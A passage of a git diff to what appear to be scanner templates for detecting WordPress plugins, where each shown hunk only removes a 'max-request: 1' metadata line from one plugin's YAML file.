b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ 